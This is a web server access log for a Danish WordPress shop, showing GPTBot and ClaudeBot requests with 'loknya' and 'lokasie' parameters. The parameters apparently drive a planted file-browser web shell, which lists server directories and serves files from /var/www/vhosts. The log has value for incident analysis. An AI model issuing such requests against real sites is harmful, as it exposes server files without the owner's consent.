74.7.227.174 - - [29/Jul/2026:08:41:33 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/8/d/3/8d3e01a20bf0bb32&loknya=/var/www/vhosts/store-bors.dk/lscache/8/d/3 HTTP/2" 200 19635 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/8/d/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:41:33 +0200] "GET /?loknya=/var/www/vhosts/stor-bors.dk/./lscach/5/c HTTP/2" 200 1793 "https://www.store-bors.dk/?loknya=/var/www/vhosts/stor-bors.dk/./lscach/5/c/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:33 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.k%2Flscache%2F8%2Fe%2F HTTP/2" 200 1778 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:34 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fe%2Fd%2Fe HTTP/2" 200 1995 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:34 +0200] "GET /?loknya=/var/www/vhosts/store-bors.k/./lscache/6/a HTTP/2" 200 1786 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.k/./lscache/6/a/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:34 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/1/b/6/1b6ee98eb7f7ddfc&loknya=/var/www/vhosts/store-bors.dk/lscache/1/b/6 HTTP/2" 200 1831 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/1/b/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:34 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F9%2F3%2F2 HTTP/2" 200 2047 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:34 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.k/./lscche/6/ HTTP/2" 200 1769 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.k/./lscache/6/a/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:34 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/b/6/1/b6126fe660c375ca&loknya=/var/www/vhosts/store-bors.dk/lscache/b/6/1 HTTP/2" 200 17631 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/b/6/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:34 +0200] "GET /?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F%2FIMG_5144-scaled.jpg&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F HTTP/2" 200 62930 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:35 +0200] "GET /index.php?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fb%2Fc%2Fd%2Fbcd3abb653595c30&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fb%2Fc%2Fd HTTP/2" 200 25879 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:35 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F5%2Fd%2F7 HTTP/2" 200 2037 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:35 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/1/a HTTP/2" 200 2186 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
